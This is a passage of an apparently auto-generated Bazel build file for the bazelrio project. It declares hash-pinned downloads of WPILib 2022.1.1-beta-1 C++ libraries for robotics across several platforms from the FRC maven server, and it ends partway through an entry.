load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe")
load("@bazelrio//:deps_utils.bzl", "cc_library_headers", "cc_library_shared", "cc_library_sources", "cc_library_static")
def setup_wpilib_2022_1_1_beta_1_dependencies():
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "c926798f365dcb52f8da4b3aa16d2b712a0b180e71990dab9013c53cb51ec8c9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "134d58c2d76ee9fc57f2e8c69b3f937175d98b9f33cd7b2f11504f2b16ca57a0",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "634688e85581e4067213b8578b8f1368aada728e2f894f7ac0460e60390dc3a6",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "9cccf85bd6d0a576174d2bc352eda5f46fbba2878ff74a33711f99c21d0e3467",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "042f30b8ff66f862868df5557d38b1518f85641ad3b824b13e5804137da0955e",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "19076d7738bdcf3351286750abcd63cf3b9be3ae094975c1a44212d618ffdd93",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "c1a67b54dece57acefc92a888f85320b1623fa1d3e55b6b36721841c0a0c8926",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "88834ad637e9c7a3b92c1dca72a7a18b00f67e711ab4e51125bfff44996c5331",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "ee96572633364a858348ecfd781a54a915ec44e61ff66c74d115dc5a25667788",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "3811ded44c6350f51047b115a50c713fdeb81e68f47b6fb0c17131117e7d9f9b",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "ccb9f76f81afde7100eee4940a19d5ccd5cba8a558570b9a1f1a051430a6d262",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "9711645efa98f61a9634ce2bd68a1aae56bcfcd9944b8ada2bd7564480f5d66e",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "2ac30bba83f507dfa4b63bb9605153a5f40b95d4f17ae91229c96fe9ea0cd4ac",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "da54ece30b3d429f1a6263b90a316e9ab4f891176412704be9825225e39afaf3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "8299fbc2e2ac770deabf4c6cd37cfa1a8efef9fd700a3f2ca99d7e1c6a6ec40d",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "217867fabddf6331c0aa950431e3d2c6430f8afee5754736a96c904431abc557",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "c090c7a22f179b0987fec03f603656b1ec5ce1666ba4c70ef8473a9a7803a075",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "0386e15436bd22dffb4e18829c0bc58c19d7520512bc7c9af92b494ef33f41ce",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "a4f8a16b4082577733d10ba420fcae5174ceaec7f42260fb60197fb317f89335",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "8913794392a9a8a33577f454e0ad055f9985d9b54dc7857e06b85fc2944d5de7",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "0959646557ae65cc3be8894ee8d39beb7c951ffd6be993ab58c709851069bdf3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "1fb70cd539e29463bb468a5fd4f8342fdbfd51fbe123abb3183eeb69ba18831b",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "cc10bb439a75f6d97f89761ed27cc1df12dffd330d6fc052383a21d8a9575ffb",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "fcfc83f420f57549d1f8068edd1e1182f2c5bc7562caca6129326ba116621d5d",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "4dfff5233bb7b0b8ea3c4b9eefc31d0c17fd0962ffaf785ec87305bd6b55e5da",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "3c54a5440519e4001fdd3e3e4c7f4a5c9cc26c7a4d6910bc0a5b66e5fa4459be",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "099125e210b1a3ddcd1854bbfa236dbe6477dd1bd6ed7dcc1c95f12b0e212a61",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "fbf604a990af907944923157c20d33d3bc2050cf40a719abdd3c14344e69f4b2",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "6efa9420ef875cd69a4d3d55ebfde2b9ed0ed2bd61db9811dcb2e274b0ae56d8",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "ed55b6ea290b075a9a7f1c94852a50c1a5e28ce3e01d3cab713811eeca03803d",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "099448b290666ca9d594e28fb21c5b4d199b31669d61d8d26b7b837245f74dc3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "aad15ca5bd6976730465ba1896f07576529e8384a2a3740ab60345a430ff0bb3",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "389018e731f998c8fe2ce42e80cf2eae60935a386d3c40af54f7cf9159e9a70e",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "98483d6dea79148389d25ce0ece2ea474d43a041d39aaaf3998bc51a2b109b53",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "07989a5109f6aab4fab038fb36b25511b965d0179bdcf7ba13b6d200d77592e4",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "c0acb88ac54d06cebba5374aa6ef10ba9f4f6019c1352718c5d8ce70232a55d6",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "5b3623a3f6d87f33d98cec7d6e6a7bb1983bf43f1056d9983fbb4c15d269821a",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "765bdd0196a487125b4076dd5eaabfaf2c4a0e37391a975592c3d141e7ae39e0",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "403322df2c7637bc0c47e5437d4fea678962375989149f5ae6ecf81810b80d67",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "db0e677a833054cccb0df6eefcad8888970f2b9c65a7b0c6211ce1969c32acb2",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "86090d1cde7a10662abb7e163f5920e743ca0210a72691f3edaaa7501bd7381a",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "b4d6c1a57c398dd131baa5632e66257d139c22620b31637abfb9cb2eec641fa2",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "064beaffc16feee23c01a868cfc6b548537badc5332a0cc753f5714dedb0f6d3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "403826a614ed8a46720b52f89d8d337ce6cc89c55bddde29667af65b7f1d9d79",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "e89d7504bea9ae7007bc80b13d595451e2486f449dd3c1878783000dcc95fc80",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "48ebd0fe7e162ac5a624055768e07237278885657697e8533cad5bd8656b5373",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "6c224639a477f789cc4198022bf07014ccd28a7643025e8bcd8157d300d42753",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "3737e59c8c0d70b3926426f3fba0c3f7c9275d5c6dbaf68708631578de6ff8a1",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "5dfd502ac49fc6f0fa33727b2078389ac3616ee995b9878b34d85e07d908ed0a",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "edaf77f5ee765213fac1c39169c8cf7568cf6a0e1fe1841cea56385f10a4483a",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "47885af110d9faca20b952fcb952563ba0aef3dd7aab9b9693712d63b96f46a3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "ed2ba5e2be2542de80ae974f29b47e9a788184425497e88b65ca6525d3ea0ce0",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "1a2860600a2265578b5eb4ee04bf54286fd6a853a46821d299e40d2828fd5162",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "5f6e5dd516217cae42849a83b58a4072d4df0250aac0d5c704cba400cc7a2b7f",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "85c1840acbb9592776e788cf352c64f0ceaa2f17167290211940c0e6f6affe12",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "c53615899910ae011f21824ec0cbfb462d0ad8a8630ddef9576674bfa6238d32",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "414c15f0fcc21ef814a515af73319284193817784766e963bf548ea088c32912",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "598281e2232aa2adfa56a64359e2c26fde8ac211fac2e76ef8bb28ce7875759c",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "0c5abbef3b75a0c628a25fd5c5f014d1fd13f4e6f9a142e3c44fdcc7ce3ee5a2",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "e4c046e19b1aef915f501dcfc7944abd608412d080c064d788610f5a470d0a28",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "382221f7ba2942cf74e96a56a3a2d8d2a581ff1a187d4fdc26970520ffa36eaf",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "98889140f84057385ca8263405ade9b11a552ca3bacbbaa327f32515d16e0bec",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "d5bbb852db8ba3345495bbd1fe865f3d650a13349a1d0fb8c401de702bc1206f",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "ed33579479ed14b317995507782a35a18c49569705d72f5118004093c6b9a7ae",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "bb2fd292aeb59e3c05b495cdf3889885601fc1de5520597b779dd1bc90976db9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "be3c019597b8787c05d0c0c82096466a00d622e8bc8e1cb58569dfff28ab66d3",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "dde2724d4c88fe659aea7b855ae4ab55105963c2a2f5db6ebca93f6f49b89a42",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "47d3c6b7fae8808eda0c31a148890f43cbd7093b499d869bb48dece5ccb6c7f1",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "95d3cd2305e89dec7d82e6ece371d95b1786ac456ac6277f6a2746febeb73d1c",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "ab6536f368e736c97edd79ed018a129549fa5cf9810b6bfd509a267fb17e594d",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "475483064284e6922327b0d58bf3511ca4671f7b527d37a014217c995516d12c",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "a70860defafb87cf2f09fe5a2495ae5d7332fe5de1a46c4832e06febfca3e3b1",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-windowsx86-64.zip",
